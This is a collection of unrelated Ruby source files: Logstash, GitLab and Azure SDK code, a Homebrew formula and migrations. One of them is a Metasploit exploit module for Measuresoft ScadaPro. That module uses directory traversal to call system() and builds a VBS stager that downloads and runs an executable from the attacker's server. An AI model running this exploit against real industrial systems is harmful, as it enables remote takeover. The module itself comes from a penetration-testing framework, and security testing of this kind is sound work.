:default => 15 # Choose where logstash starts initially reading files - at the beginning or # at the end. The default behavior treats files like live streams and thus # starts at the end. If you have old data you want to import, set this # to 'beginning' # # This option only modifieds "first contact" situations where a file is new # and not seen before. If a file has already been seen before, this option # has no effect. config :start_position, :validate => [ "beginning", "end"], :default => "end" public def initialize(params) super @path.each do |path| if Pathname.new(path).relative? raise ArgumentError.new("File paths must be absolute, relative path specified: #{path}") end end end public def register require "addressable/uri" require "filewatch/tail" require "digest/md5" LogStash::Util::set_thread_name("input|file|#{path.join(":")}") @logger.info("Registering file input", :path => @path) @tail_config = { :exclude => @exclude, :stat_interval => @stat_interval, :discover_interval => @discover_interval, :sincedb_write_interval => @sincedb_write_interval, :logger => @logger, } if @sincedb_path.nil? if ENV["HOME"].nil? @logger.error("No HOME environment variable set, I don't know where " \ "to keep track of the files I'm watching. Either set " \ "HOME in your environment, or set sincedb_path in " \ "in your logstash config for the file input with " \ "path '#{@path.inspect}'") raise # TODO(sissel): HOW DO I FAIL PROPERLY YO end # Join by ',' to make it easy for folks to know their own sincedb # generated path (vs, say, inspecting the @path array) @sincedb_path = File.join(ENV["HOME"], ".sincedb_" + Digest::MD5.hexdigest(@path.join(","))) # Migrate any old .sincedb to the new file (this is for version <=1.1.1 compatibility) old_sincedb = File.join(ENV["HOME"], ".sincedb") if File.exists?(old_sincedb) @logger.info("Renaming old ~/.sincedb to new one", :old => old_sincedb, :new => @sincedb_path) File.rename(old_sincedb, @sincedb_path) end @logger.info("No sincedb_path set, generating one based on the file path", :sincedb_path => @sincedb_path, :path => @path) end @tail_config[:sincedb_path] = @sincedb_path if @start_position == "beginning" @tail_config[:start_new_files_at] = :beginning end end # def register public def run(queue) @tail = FileWatch::Tail.new(@tail_config) @tail.logger = @logger @path.each { |path| @tail.tail(path) } hostname = Socket.gethostname @tail.subscribe do |path, line| source = Addressable::URI.new(:scheme => "file", :host => hostname, :path => path).to_s @logger.debug("Received line", :path => path, :line => line) e = to_event(line, source) if e queue << e end end finished end # def run public def teardown @tail.quit end # def teardown end # class LogStash::Inputs::File
34.48951
98
0.652068
1c75ac9922730f038cc61c648ac8e244a5e2e2bb
1,369
# frozen_string_literal: true require 'spec_helper' describe Gitlab::NotifyUponDeath do let(:worker_class) do Class.new do include Sidekiq::Worker include Gitlab::NotifyUponDeath end end describe '.sidekiq_retries_exhausted' do it 'notifies the JobWaiter when 3 arguments are given and the last is a String' do job = { 'args' => [12, {}, '123abc'], 'jid' => '123' } expect(Gitlab::JobWaiter) .to receive(:notify) .with('123abc', '123') worker_class.sidekiq_retries_exhausted_block.call(job) end it 'does not notify the JobWaiter when only 2 arguments are given' do job = { 'args' => [12, {}], 'jid' => '123' } expect(Gitlab::JobWaiter) .not_to receive(:notify) worker_class.sidekiq_retries_exhausted_block.call(job) end it 'does not notify the JobWaiter when only 1 argument is given' do job = { 'args' => [12], 'jid' => '123' } expect(Gitlab::JobWaiter) .not_to receive(:notify) worker_class.sidekiq_retries_exhausted_block.call(job) end it 'does not notify the JobWaiter when the last argument is not a String' do job = { 'args' => [12, {}, 40], 'jid' => '123' } expect(Gitlab::JobWaiter) .not_to receive(:notify) worker_class.sidekiq_retries_exhausted_block.call(job) end end end
26.326923
86
0.641344
28962230388f08fbc418e35bcf4d69d5d2b13842
2,073
# encoding: UTF-8 module Axlsx # A ScatterSeries defines the x and y position of data in the chart # @note The recommended way to manage series is to use Chart#add_series # @see Worksheet#add_chart # @see Chart#add_series # @see examples/example.rb class ScatterSeries < Series # The x data for this series. # @return [NamedAxisData] attr_reader :xData # The y data for this series. # @return [NamedAxisData] attr_reader :yData # The fill color for this series. # Red, green, and blue is expressed as sequence of hex digits, RRGGBB. A perceptual gamma of 2.2 is used. # @return [String] attr_reader :color # Creates a new ScatterSeries def initialize(chart, options={}) @xData, @yData = nil super(chart, options) @xData = AxDataSource.new(:tag_name => :xVal, :data => options[:xData]) unless options[:xData].nil? @yData = NumDataSource.new({:tag_name => :yVal, :data => options[:yData]}) unless options[:yData].nil? end # @see color def color=(v) @color = v end # Serializes the object # @param [String] str # @return [String] def to_xml_string(str = '') super(str) do # needs to override the super color here to push in ln/and something else! if color str << '<c:spPr><a:solidFill>' str << ('<a:srgbClr val="' << color << '"/>') str << '</a:solidFill>' str << '<a:ln><a:solidFill>' str << ('<a:srgbClr val="' << color << '"/></a:solidFill></a:ln>') str << '</c:spPr>' str << '<c:marker>' str << '<c:spPr><a:solidFill>' str << ('<a:srgbClr val="' << color << '"/>') str << '</a:solidFill>' str << '<a:ln><a:solidFill>' str << ('<a:srgbClr val="' << color << '"/></a:solidFill></a:ln>') str << '</c:spPr>' str << '</c:marker>' end @xData.to_xml_string(str) unless @xData.nil? @yData.to_xml_string(str) unless @yData.nil? end str end end end
31.409091
109
0.56247
e29d984df94cadf3b847d3f1bd5df6a8248d0729
44
module EventMachine VERSION = "1.2.1" end
11
19
0.704545
216a97f8771375dd634cc2c74a49e0e70392bb6c
4,333
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Measuresoft ScadaPro Remote Command Execution', 'Description' => %q{ This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. This vulnerability affects version 4.0.0 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Initial discovery/poc 'mr_me <steventhomasseeley[at]gmail.com>', # msf 'TecR0c <tecr0c[at]tecninja.net>', # msf ], 'References' => [ [ 'CVE', '2011-3497'], [ 'BID', '49613'], [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'], [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'], # seemed pretty accurate to us ;) [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ # truly universal [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 16 2011')) register_options( [ Opt::RPORT(11234), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), ], self.class) end # couldn't generate a vbs or exe payload and then use the wF command # as there is a limit to the amount of data to write to disk. # so we just write out a vbs script like the old days. def build_vbs(url, stager_name) name_xmlhttp = rand_text_alpha(2) name_adodb = rand_text_alpha(2) tmp = "#{@temp_folder}/#{stager_name}" vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") " vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send" vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") " vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 " vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody " vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 " vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}" return vbs end def on_request_uri(cli, request) if request.uri =~ /\.exe/ print_status("Sending 2nd stage payload") return if ((p=regenerate_payload(cli)) == nil) data = generate_payload_exe( {:code=>p.encoded} ) send_response(cli, data, {'Content-Type' => 'application/octet-stream'} ) return end end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. @payload_name = rand_text_alpha(4) @temp_folder = "C:/Windows/Temp" if datastore['SRVHOST'] == '0.0.0.0' lhost = Rex::Socket.source_address('50.50.50.50') else lhost = datastore['SRVHOST'] end payload_src = lhost payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe" stager_name = rand_text_alpha(6) + ".vbs" stager = build_vbs(payload_src, stager_name) path = "..\\..\\..\\..\\..\\windows\\system32" createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n" download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n" print_status("Sending 1st stage payload...") connect sock.get_once() sock.put(createvbs) sock.get_once() sock.put(download_execute) handler() disconnect super end end
33.589147
125
0.600969
4a2e038318c90a7060c108707c49c9eeff9bef52
71
class WelcomeController < ApplicationController def index end end
14.2
47
0.802817
79b8ec5a56ca8ab54b5394181e57ad266490c7c3
8,527
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Signalr::Mgmt::V2018_10_01 # # REST API for Azure SignalR Service # class Operations include MsRestAzure # # Creates and initializes a new instance of the Operations class. # @param client service class for accessing basic functionality. # def initialize(client) @client = client end # @return [SignalRManagementClient] reference to the SignalRManagementClient attr_reader :client # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Array<Operation>] operation results. # def list(custom_headers:nil) first_page = list_as_lazy(custom_headers:custom_headers) first_page.get_all_items end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_with_http_info(custom_headers:nil) list_async(custom_headers:custom_headers).value! end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_async(custom_headers:nil) fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'providers/Microsoft.SignalRService/operations' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Signalr::Mgmt::V2018_10_01::Models::OperationList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [OperationList] operation results. # def list_next(next_page_link, custom_headers:nil) response = list_next_async(next_page_link, custom_headers:custom_headers).value! response.body unless response.nil? end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_next_with_http_info(next_page_link, custom_headers:nil) list_next_async(next_page_link, custom_headers:custom_headers).value! end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_next_async(next_page_link, custom_headers:nil) fail ArgumentError, 'next_page_link is nil' if next_page_link.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = '{nextLink}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], skip_encoding_path_params: {'nextLink' => next_page_link}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Signalr::Mgmt::V2018_10_01::Models::OperationList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [OperationList] which provide lazy access to pages of the response. # def list_as_lazy(custom_headers:nil) response = list_async(custom_headers:custom_headers).value! unless response.nil? page = response.body page.next_method = Proc.new do |next_page_link| list_next_async(next_page_link, custom_headers:custom_headers) end page end end end end
37.730088
141
0.684649
7aa838286909cf1565f8d7d1dcf2004d7ddd2493
3,090
# # Gems # require 'active_support/core_ext/module/introspection' # # Project # require 'metasploit/framework/command' require 'metasploit/framework/parsed_options' require 'metasploit/framework/require' # Based on pattern used for lib/rails/commands in the railties gem. class Metasploit::Framework::Command::Base # # Attributes # # @!attribute [r] application # The Rails application for metasploit-framework. # # @return [Metasploit::Framework::Application] attr_reader :application # @!attribute [r] parsed_options # The parsed options from the command line. # # @return (see parsed_options) attr_reader :parsed_options # # Class Methods # # @note {require_environment!} should be called to load # `config/application.rb` to so that the RAILS_ENV can be set from the # command line options in `ARGV` prior to `Rails.env` being set. # @note After returning, `Rails.application` will be defined and configured. # # Parses `ARGV` for command line arguments to configure the # `Rails.application`. # # @return (see parsed_options) def self.require_environment! parsed_options = self.parsed_options # RAILS_ENV must be set before requiring 'config/application.rb' parsed_options.environment! ARGV.replace(parsed_options.positional) # allow other Rails::Applications to use this command if !defined?(Rails) || Rails.application.nil? # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/commands.rb#L39-L40 require Pathname.new(__FILE__).parent.parent.parent.parent.parent.join('config', 'application') end # have to configure before requiring environment because # config/environment.rb calls initialize! and the initializers will use # the configuration from the parsed options. parsed_options.configure(Rails.application) Rails.application.require_environment! parsed_options end def self.parsed_options parsed_options_class.new end def self.parsed_options_class @parsed_options_class ||= parsed_options_class_name.constantize end def self.parsed_options_class_name @parsed_options_class_name ||= "#{module_parent.module_parent}::ParsedOptions::#{name.demodulize}" end def self.start parsed_options = require_environment! new(application: Rails.application, parsed_options: parsed_options).start end # # Instance Methods # # @param attributes [Hash{Symbol => ActiveSupport::OrderedOptions,Rails::Application}] # @option attributes [Rails::Application] :application # @option attributes [ActiveSupport::OrderedOptions] :parsed_options # @raise [KeyError] if :application is not given # @raise [KeyError] if :parsed_options is not given def initialize(attributes={}) @application = attributes.fetch(:application) @parsed_options = attributes.fetch(:parsed_options) end # @abstract Use {#application} to start this command. # # Starts this command. # # @return [void] # @raise [NotImplementedError] def start raise NotImplementedError end end
28.348624
102
0.734304
2651002b9b72e6cd99f2d0b6ebb54ac52e28d481
854
require "json" package = JSON.parse(File.read(File.join(__dir__, "package.json"))) Pod::Spec.new do |s| s.name = "react-native-smartad" s.version = package["version"] s.summary = package["description"] s.description = <<-DESC react-native-smartad DESC s.homepage = "https://github.com/RedPillGroup/react-native-smartad" s.license = "MIT" # s.license = { :type => "MIT", :file => "FILE_LICENSE" } s.authors = { "bsisic" => "[email protected]" } s.platforms = { :ios => "9.0" } s.source = { :git => "https://github.com/RedPillGroup/react-native-smartad.git", :tag => "#{s.version}" } s.source_files = "ios/**/*.{h,m,swift}" s.requires_arc = true s.dependency "React" s.dependency "Smart-Display-SDK" # ... # s.dependency "..." end
32.846154
113
0.578454
1aff22430f2329eff4b82c262c5d5add5dd57711
258
class CreateUsers < ActiveRecord::Migration[5.1] def change create_table :users do |t| t.string :name, null: false t.boolean :admin, default: false t.text :description t.timestamps end add_index :users, :name end end
19.846154
48
0.647287
0865e3bc209ab19cd718827be048f5df1c5896c4
941
module ConsulApplicationSettings # Utility methods to cast values and work with path module Utils SEPARATOR = '/'.freeze PARSING_CLASSES = [Integer, Float, ->(value) { JSON.parse(value) }].freeze class << self def cast_consul_value(value) return false if value == 'false' return true if value == 'true' cast_complex_value(value) end def generate_path(*parts) strings = parts.map(&:to_s) all_parts = strings.map { |s| s.split(SEPARATOR) }.flatten all_parts.reject(&:empty?).join('/') end def decompose_path(path) parts = path.to_s.split(SEPARATOR).compact parts.reject(&:empty?) end protected def cast_complex_value(value) PARSING_CLASSES.each do |parser| return parser.call(value) rescue StandardError => _e nil end value.to_s end end end end
24.128205
78
0.603613
ab76697e8aa2867c94ad5549d4d104d81324897c
154
class AddOtherRejectionReasonToVisitors < ActiveRecord::Migration[5.1] def change add_column :visitors, :other_rejection_reason, :boolean end end
25.666667
70
0.798701
619bccc2a2847baf8b5236d207db903db9027c63
377
module NamedVariant class Railtie < ::Rails::Railtie ActiveSupport.on_load(:active_record) do ActiveRecord::Base.extend ::NamedVariant::ActiveRecordExtension ActiveStorage::Attachment.prepend ::NamedVariant::VariantExtension end config.after_initialize do ActiveStorage::Attached::One.prepend ::NamedVariant::VariantExtension end end end
29
75
0.755968
2645137fc3f20b57737e75f9c4c7125d1bac7686
119
require 'test_helper' class StampTest < ActiveSupport::TestCase # test "the truth" do # assert true # end end
14.875
41
0.697479
5d5dcdd8c3d40892fb0df4939f63ff8f6a27f297
3,317
class Leafnode < Formula desc "NNTP server for small sites" homepage "http://www.leafnode.org/" url "https://downloads.sourceforge.net/project/leafnode/leafnode/1.11.11/leafnode-1.11.11.tar.bz2" sha256 "3ec325216fb5ddcbca13746e3f4aab4b49be11616a321b25978ffd971747adc0" bottle :disable, "leafnode hardcodes the user at compile time with no override available." depends_on "pcre" def install (var/"spool/news/leafnode").mkpath system "./configure", "--disable-dependency-tracking", "--prefix=#{prefix}", "--with-user=#{ENV["USER"]}", "--with-group=admin", "--sysconfdir=#{etc}/leafnode", "--with-spooldir=#{var}/spool/news/leafnode" system "make", "install" (prefix/"homebrew.mxcl.fetchnews.plist").write fetchnews_plist (prefix/"homebrew.mxcl.texpire.plist").write texpire_plist end def caveats; <<~EOS For starting fetchnews and texpire, create links, ln -s #{opt_prefix}/homebrew.mxcl.{fetchnews,texpire}.plist ~/Library/LaunchAgents And to start the services, launchctl load -w ~/Library/LaunchAgents/homebrew.mxcl.{fetchnews,texpire}.plist EOS end plist_options :manual => "leafnode" def plist; <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>OnDemand</key> <true/> <key>Label</key> <string>#{plist_name}</string> <key>Program</key> <string>#{opt_sbin}/leafnode</string> <key>Sockets</key> <dict> <key>Listeners</key> <dict> <key>SockServiceName</key> <string>nntp</string> </dict> </dict> <key>WorkingDirectory</key> <string>#{var}/spool/news</string> <key>inetdCompatibility</key> <dict> <key>Wait</key> <false/> </dict> </dict> </plist> EOS end def fetchnews_plist; <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <false/> <key>Label</key> <string>homebrew.mxcl.fetchnews</string> <key>Program</key> <string>#{opt_sbin}/fetchnews</string> <key>StartInterval</key> <integer>1800</integer> <key>WorkingDirectory</key> <string>#{var}/spool/news</string> </dict> </plist> EOS end def texpire_plist; <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <false/> <key>Label</key> <string>homebrew.mxcl.texpire</string> <key>Program</key> <string>#{opt_sbin}/texpire</string> <key>StartInterval</key> <integer>25000</integer> <key>WorkingDirectory</key> <string>#{var}/spool/news</string> </dict> </plist> EOS end test do assert_match version.to_s, shell_output("#{bin}/leafnode-version") end end
31.292453
106
0.596322
1a2fc42846a53a178a64c267a377384c94d2a6bd
750
require 'test_helper' class ImportTest < ActiveSupport::TestCase test "be valid" do import = Import.new(:name => "test") import.metadata = File.new("#{Rails.root}/test/fixtures/data/Kaarten-few.csv") user = FactoryGirl.create(:user) import.user = user assert import.valid? end test "import maps" do layer = FactoryGirl.create(:layer) import = Import.new(:name => "test") import.metadata = File.new("#{Rails.root}/test/fixtures/data/Kaarten-few.csv") user = FactoryGirl.create(:user) import.user = user import.layers << layer import.save import.import! puts import.inspect puts import.layers.inspect puts import.maps.inspect puts import.layers.first.maps.inspect end end
25.862069
82
0.68
bb56ce8a1ddc6756784309acd7d1795eafbb0ad0
4,194
# frozen_string_literal: true needs 'Thermocyclers/AbstractThermocycler' # Class for handling BioRad CFX96 qPCR thermocycler # # @author Devin Strickland <[email protected]> # @author Eriberto Lopez <[email protected]> # @note BioRad module originally deployed as `QPCR_ThermocyclerLib` # on UW BIOFAB production 10/05/18 class BioRadCFX96 < AbstractThermocycler include QPCRMixIn MODEL = 'BioRad CFX96' PROGRAM_EXT = '.prcl' LAYOUT_EXT = '.pltd' SOFTWARE_NAME = 'CFX Manager Software' # Instantiates the class # # @return [TestThermocycler] def initialize(name: 'Unnamed Thermocycler') super(name: name) end # Lab-specific, user-defined parameters # # @return [Hash] def user_defined_params { experiment_filepath: 'Desktop/_qPCR_UWBIOFAB', export_filepath: 'Desktop/BIOFAB qPCR Exports', image_path: 'Actions/BioRad_qPCR_Thermocycler', open_software_image: 'open_biorad_thermo_workspace.JPG', setup_workspace_image: 'setup_workspace.JPG', setup_program_image: 'setting_up_qPCR_thermo_conditions.png', setup_plate_layout_image: 'setting_up_plate_layout_v1.png', open_lid_image: 'open_lid.png', close_lid_image: 'close_lid.png', start_run_image: 'start_run.png', export_measurements_image: 'exporting_qPCR_quantification.png', dimensions: [8, 12] } end ########## Language Methods # These methods are not very specific and will probably need to be overridden # in the concrete classes. # Instructions for turning on the thermocycler # # @return [String] def turn_on 'If the thermocycler is off, toggle the power switch in the back of the' \ ' instrument' end # Instructions for opening the software that controls the thermocycler # # @return [String] def open_software "Open #{software_name}" end # Instructions for setting the dye channel on a qPCR thermocycler # # @param composition [PCRComposition] # @param dye_name [String] can be supplied instead of a `PCRComposition` # @return [String] # @todo should be moved to MixIn def set_dye(composition: nil, dye_name: nil) dye_name = composition.dye.try(:input_name) || dye_name "Click on the <b>PrimePCR</b> and choose <b>#{dye_name}</b> as the dye" end # Instructions for selecting the PCR program template in the software # # @param program [PCRProgram] # @return [String] def select_program_template(program:) file = program_template_file(program: program) "Choose the program template <b>#{file}</b>" end # Instructions for selecting the plate layout template in the software # # @param program [PCRProgram] # @return [String] def select_layout_template(program:) file = layout_template_file(program: program) "Choose the layout template <b>#{file}</b>" end # Instructions for placing a plate in the instrument # # @param plate [Collection] # @return [String] def place_plate_in_instrument(plate:) "Place plate #{plate} in the thermocycler" end # Instructions for confirming the orientation of a plate in the instrument # # @return [String] def confirm_plate_orientation 'MAKE SURE THAT THE PLATE IS IN THE CORRECT ORIENTATION' end # Instructions for opening the lid # # @return [String] def open_lid 'Click the <b>Open Lid</b> button' end # Instructions for closing the lid # # @return [String] def close_lid 'Click the <b>Close Lid</b> button' end # Instructions for starting the run # # @return [String] def start_run 'Click the <b>Start Run</b> button' end # Instructions for saving an experiment file # # @param filename [String] the name of the file (without the full path) # @return [String] def save_experiment_file(filename:) "Save the experiment as #{filename} in #{params[:experiment_filepath]}" end # Instructions for exporting measurements from a qPCR run # # @return [String] def export_measurements 'Click <b>Export</b><br>' \ 'Select <b>Export All Data Sheets</b><br>' \ 'Export all sheets as CSV<br>' \ "Save files to the #{params[:export_filepath]} directory" end end
28.337838
79
0.705055
b9245cd39a54c6b101d200bb149e7d030aff7132
154
class CreateShoppings < ActiveRecord::Migration def change create_table :shoppings do |t| t.string :name t.timestamps end end end
17.111111
47
0.681818
2886d534cdfa20108926cbd7ffb55bb4fdb598fd
1,124
require "language/node" class Whistle < Formula desc "HTTP, HTTP2, HTTPS, Websocket debugging proxy" homepage "https://github.com/avwo/whistle" url "https://registry.npmjs.org/whistle/-/whistle-2.6.7.tgz" sha256 "cc93aa4e5ff46c80edf7754878e55494f199481b800d2ba19c0e4996358ef633" license "MIT" bottle do sha256 cellar: :any_skip_relocation, arm64_big_sur: "89d75d8fd94e6bb272787d1e30da2981dc9820f340dd52d7a40c111a0d5d50dc" sha256 cellar: :any_skip_relocation, big_sur: "06016938110db64a8645a7729d10a0120aa342e06d2414a9ffca4519c60eb4ef" sha256 cellar: :any_skip_relocation, catalina: "b0b7eacff7379d821cfcb338c23b4484c0a1d4bc39aa2d862413a6f6d030ac70" sha256 cellar: :any_skip_relocation, mojave: "7937d9c596a5afb57f45c28b8d0c0d576f9ae1a75a7cd7cb12237919dc793aeb" end depends_on "node" def install system "npm", "install", *Language::Node.std_npm_install_args(libexec) bin.install_symlink Dir["#{libexec}/bin/*"] end test do (testpath/"package.json").write('{"name": "test"}') system bin/"whistle", "start" system bin/"whistle", "stop" end end
37.466667
122
0.764235
915efce428f3d1e6a57b8e83c255ebdef170461f
127
class AddScoreToSubmission < ActiveRecord::Migration[5.0] def change add_column :submissions, :score, :integer end end
21.166667
57
0.755906
91cf6531e4d1f5765486ecf78d65f511aa0b43a1
1,171
require 'spec_view_helper' # As of 3.0.x :type tags are no longer inferred. # This means, without the `type: :view` tag, the render method does not exist # in the example context describe 'hydramata/works/fieldsets/_show.html.erb', type: :view do let(:object) { double('Object', properties: [property1, property2], container_content_tag_attributes: { class: 'my-dom-class' } ) } # A short circuit as the render does not normally let(:property1) { double('Property', render: '<div class="property1">Property 1</div>'.html_safe) } let(:property2) { double('Property', render: '<div class="property2">Property 2</div>'.html_safe) } it 'renders the object and fieldsets' do expect(object).to receive(:label).and_return('Heading') render partial: 'hydramata/works/fieldsets/show', object: object expect(property1).to have_received(:render).with(view) expect(property2).to have_received(:render).with(view) expect(rendered).to have_tag('section.my-dom-class') do with_tag('.heading', text: 'Heading') with_tag('.metadata .property1', text: 'Property 1') with_tag('.metadata .property2', text: 'Property 2') end end end
46.84
134
0.708796
39a46fbb1c72728ea70212962014e2419f341fc9
144
class Tag < ApplicationRecord has_many :taggings has_many :records, through: :taggings belongs_to :user validates_presence_of :name end
20.571429
39
0.784722
acff75b03b292e8a0511c1436ff6c9a614be1adc
4,598
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::DataFactory::Mgmt::V2018_06_01 module Models # # The Dynamics CRM entity dataset. # class DynamicsCrmEntityDataset < Dataset include MsRestAzure def initialize @type = "DynamicsCrmEntity" end attr_accessor :type # @return The logical name of the entity. Type: string (or Expression # with resultType string). attr_accessor :entity_name # # Mapper for DynamicsCrmEntityDataset class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'DynamicsCrmEntity', type: { name: 'Composite', class_name: 'DynamicsCrmEntityDataset', model_properties: { additional_properties: { client_side_validation: true, required: false, type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'ObjectElementType', type: { name: 'Object' } } } }, description: { client_side_validation: true, required: false, serialized_name: 'description', type: { name: 'String' } }, structure: { client_side_validation: true, required: false, serialized_name: 'structure', type: { name: 'Object' } }, schema: { client_side_validation: true, required: false, serialized_name: 'schema', type: { name: 'Object' } }, linked_service_name: { client_side_validation: true, required: true, serialized_name: 'linkedServiceName', default_value: {}, type: { name: 'Composite', class_name: 'LinkedServiceReference' } }, parameters: { client_side_validation: true, required: false, serialized_name: 'parameters', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'ParameterSpecificationElementType', type: { name: 'Composite', class_name: 'ParameterSpecification' } } } }, annotations: { client_side_validation: true, required: false, serialized_name: 'annotations', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'ObjectElementType', type: { name: 'Object' } } } }, folder: { client_side_validation: true, required: false, serialized_name: 'folder', type: { name: 'Composite', class_name: 'DatasetFolder' } }, type: { client_side_validation: true, required: true, serialized_name: 'type', type: { name: 'String' } }, entity_name: { client_side_validation: true, required: false, serialized_name: 'typeProperties.entityName', type: { name: 'Object' } } } } } end end end end
30.052288
75
0.418878
ff717296c622e717d351aa626bad757843090419
905
